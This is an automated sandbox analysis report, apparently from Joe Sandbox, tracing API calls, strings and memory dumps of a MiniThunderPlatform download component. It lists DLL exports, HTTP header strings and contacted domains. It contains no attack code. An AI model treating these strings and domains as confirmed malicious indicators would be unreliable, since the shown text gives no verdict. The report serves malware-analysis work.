                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A8745
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8757
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8769
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A877D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,00000000,?,?,?,00000000,?,?,?,1027B998), ref: 100A8797
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A87B3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A87EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A87FB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8810
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(6to23.com,00000000,00000009), ref: 100A8845
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes=), ref: 100A88A4
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A88DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A88EF
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A89AC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A89BD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A89CF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,00000000), ref: 100A8A04
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8A20
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8A6C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8B16
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 100A8B7F
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100A8B90
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(.xunlei.com,00000000,0000000B), ref: 100A8BB3
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(.sandai.net,00000000,0000000B), ref: 100A8BD2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8C3A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8D9C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A8DCD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8DE9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8E21
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8E33
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100A8EB5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(HTTP/1.1,?,00000000), ref: 100A7CD9
                                                                                                                                                • Part of subcall function 10013C80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CStringSetter,00000000,?,?,10240554,000000FF,1000417F,?), ref: 10013CA9
                                                                                                                                                • Part of subcall function 10013C80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013CCF
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 100D0DE1: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0DF4
                                                                                                                                                • Part of subcall function 100D0DE1: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E00
                                                                                                                                                • Part of subcall function 100D0DE1: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(00000000,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E0E
                                                                                                                                                • Part of subcall function 100D0DE1: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E1D
                                                                                                                                                • Part of subcall function 100D0DE1: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E44
                                                                                                                                                • Part of subcall function 100D0DE1: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000007,?,?,?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E50
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100A8F3A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8F5B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A8F9B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8FB7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8FEF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9001
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A900E
                                                                                                                                                • Part of subcall function 100281C0: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 10028231
                                                                                                                                                • Part of subcall function 100281C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10028243
                                                                                                                                                • Part of subcall function 10029600: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?), ref: 10029645
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(request length too long!), ref: 100A9096
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102BBD20,?), ref: 100A90BC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9137
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A914C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9161
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9176
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A918B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A91A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A91B5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V12@V12@@$V01@@$?append@?$basic_string@$D@1@@std@@D@2@@0@V?$basic_string@$??$?9$?assign@?$basic_string@V01@Y?$basic_string@$?rend@?$basic_string@D@2@@std@@@2@H_prologV?$reverse_iterator@Vconst_iterator@?$basic_string@$?find@?$basic_string@$?end@?$basic_string@CriticalSectionVconst_iterator@12@$??$?8EnterExceptionLeaveThrow
                                                                                                                                              • String ID: "$#$*/*$.sandai.net$.xunlei.com$0$1$6$6to23.com$Accept$Accept-Language$Authorization$Basic $Cache-Control$Connection$Cookie$GET$HTTP/1.1$Host$If-Modified-Since$Keep-Alive$M$N$O$Pragma$Proxy-Authorization$Range$Referer$S$User-Agent$bytes=$close$no-cache$request length too long!
                                                                                                                                              • API String ID: 1247736521-1837566173
                                                                                                                                              • Opcode ID: 60cbb3b46676b9cd4384753f6fd0793b2db016069a3757a5f33d0803bf5ea968
                                                                                                                                              • Instruction ID: 5077a996b817eeb74417b47500a0c7cfc17e5b5f23bfb336ac02de1b08a9159c
                                                                                                                                              • Opcode Fuzzy Hash: 60cbb3b46676b9cd4384753f6fd0793b2db016069a3757a5f33d0803bf5ea968
                                                                                                                                              • Instruction Fuzzy Hash: 23D279741083C19FD735DB64C89DBDFBBE8AFA9204F00495CE98A43292DB746648CB67

                                                                                                                                              Control-flow Graph
                                                                                                                                              • [Control-flow graph figure; legend: Executed / Not Executed]
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424206
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 0042421B
                                                                                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 0042422B
                                                                                                                                              • ??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 00424257
                                                                                                                                              • GetLastError.KERNEL32 ref: 0042428C
                                                                                                                                              • ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z.MSVCP71(00000000,LoadLibrary failed, path: ,?,, errno: ,00000000), ref: 004242B8
                                                                                                                                              • ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z.MSVCP71(00000000), ref: 004242D2
                                                                                                                                              • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 004242E4
                                                                                                                                              • ??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ.MSVCP71 ref: 00424304
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424320
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,asyn_stop_task), ref: 00424346
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,stop_task), ref: 00424370
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004243A2
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004485B0), ref: 004243FE
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 0042443C
                                                                                                                                              • GetLastError.KERNEL32 ref: 00424471
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,GetProcAddress failed, func_name: ,004485B0,, errno: ,00000000), ref: 004244AC
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 004244C3
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 004244D4
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 004244E6
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 00424506
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424522
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424552
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_$U?$char_traits@$V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_V10@$D@std@@@std@@$??$?6AddressD@std@@@0@ProcV?$basic_ostream@W@std@@@std@@$??$?6_D@2@@std@@D@std@@ErrorLastV01@V?$allocator@V?$basic_ostream@_W@std@@@0@$??0?$basic_stringstream@??0?$basic_stringstream@_??6?$basic_ostream@??6?$basic_ostream@_?data@?$basic_string@_D?$basic_stringstream@D?$basic_stringstream@_LibraryLoad
                                                                                                                                              • String ID: !$, errno: $, errno: $GetProcAddress failed, func_name: $LoadLibrary failed, path: $add_peer_resource$add_server_resource$asyn_stop_task$create_continued_task$create_new_task$delete_task$delete_tempfile$discard_peer_resource$download_engine.dll$force_stop_task$get_failure_detail$get_res_save_data_stat$get_resource_statistic$hz_init$init$is_enable_run$query_task_info$query_task_info_ex$read_ie_proxy$set_addition_info$set_channel_switch$set_complete_file_name$set_cookie$set_partner_id$set_proxy_info$set_res_query_cid_and_file_size$set_res_use_strategy$set_speed_limit$set_temp_file_suffix$set_thread_num$set_upload_speed_limit$set_user_agent$start_task$stop_task$thunderS_register_client$uninit
                                                                                                                                              • API String ID: 3651995306-2164738031
                                                                                                                                              • Opcode ID: 3f9c143797c558e82843c7467775b01e56645df5c8f353659db7987fa62e3372
                                                                                                                                              • Instruction ID: 7c371fe62e2d6598a1981eb650a3d01231fd11887f894fd9d3896b845fad67d4
                                                                                                                                              • Opcode Fuzzy Hash: 3f9c143797c558e82843c7467775b01e56645df5c8f353659db7987fa62e3372
                                                                                                                                              • Instruction Fuzzy Hash: E81239B1D002688FDF60DFA8C9857DDBBB4AF04308F51419AE509BB241DB799E84CF99

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000002,00000000,00000005,?), ref: 0041B7E2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000006,?,00000004,?), ref: 0041B892
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(?,?,00000006,?,00000004,?), ref: 0041B8BB
                                                                                                                                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B8CE
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(?,00000006,?,00000004,?), ref: 0041B8E8
                                                                                                                                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B8FB
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(004480A8,?,00000006,?,00000004,?), ref: 0041B91A
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B954
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B967
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B97A
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B98D
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(004480A5,00000000,00000000,?,00000006,?,00000004,?), ref: 0041B9AA
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B9C0
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B9D6
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B9EC
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BA39
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0041BA4F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 0041BA73
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAB2
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAC5
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAD8
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAEB
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(004480A5,00000000,00000000,?,00000006,?,00000004,?), ref: 0041BB08
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB1E
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB34
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB4A
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB80
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB93
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BBC6
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BBD9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,00000006,?,00000004,?), ref: 0041BC33
                                                                                                                                              • ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,7C373C84,?,00000006,?,00000004,?), ref: 0041BC59
                                                                                                                                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?,?,?,00000006,?,00000004,?), ref: 0041BC78
                                                                                                                                              • ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,?,?,00000006,?,00000004,?), ref: 0041BC97
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(mail-attachment.googleusercontent.com,00000000,00000004,?), ref: 0041BCC5
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(http://store.paycenter.uc.cn,00000000), ref: 0041BCEB
                                                                                                                                              • ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ.MSVCP71(0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041BD3B
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BD57
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0041BD6D
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041BE6E
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(?), ref: 0041BEC0
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BEF1
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(?), ref: 0041BF43
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BF68
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(?), ref: 0041BFBA
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041C001
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0041C016
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000002,00000000,00000002,00000000,0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041C0B6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 0041C0DE
                                                                                                                                              Strings
                                                                                                                                              • mail-attachment.googleusercontent.com, xrefs: 0041BCBA
                                                                                                                                              • http://store.paycenter.uc.cn, xrefs: 0041BCE0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
